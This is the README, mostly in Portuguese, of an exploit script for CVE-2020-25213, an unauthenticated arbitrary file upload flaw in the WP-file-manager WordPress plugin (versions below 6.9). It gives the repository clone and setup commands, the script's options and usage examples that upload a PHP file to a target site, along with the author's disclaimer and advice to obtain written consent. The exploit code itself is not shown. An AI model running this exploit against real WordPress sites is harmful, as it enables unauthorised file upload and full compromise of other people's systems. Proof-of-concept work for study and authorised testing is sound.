
https://medium.com/@mansoorr/exploiting-cve-2020-25213-wp-file-manager-wordpress-plugin-6-9-3f79241f0cd8
O plugin WP-file-manager do WordPress (<6.9) é vulnerável a upload arbitrário de arquivos sem autenticação, resultando em comprometimento total do sistema.
Para mais detalhes, consulte meu artigo publicado aqui
Não fui eu quem descobriu esta vulnerabilidade e não levo nenhum crédito por este CVE. Eu apenas criei o exploit após analisar a descrição disponível em vários blogs, como wordfence, seravo, com o objetivo de ajudar os leitores a entender como criar um POC apenas analisando a descrição da vulnerabilidade.
Não sou responsável por nenhum dano causado a uma organização que use este exploit e aconselho os leitores a não explorar esta vulnerabilidade sem consentimento por escrito da organização, pois isso pode expor a organização a ataques de outros hackers.
git clone https://github.com/mansoorr123/wp-file-manager-CVE-2020-25213.git
chmod +x wp-file-manager-CVE-2020-25213/wp-file-manager-exploit.sh
-u|--wp_url Wordpress target url
-f|--upload_file Absolute location of local file to upload on the target.
-k|--check Only checks whether the vulnerable endpoint exists & have particular fingerprint or not. No file is uploaded.
-v|--verbose Also prints curl command which is going to be executed
-h|--help Print Help menu
./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check
./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose
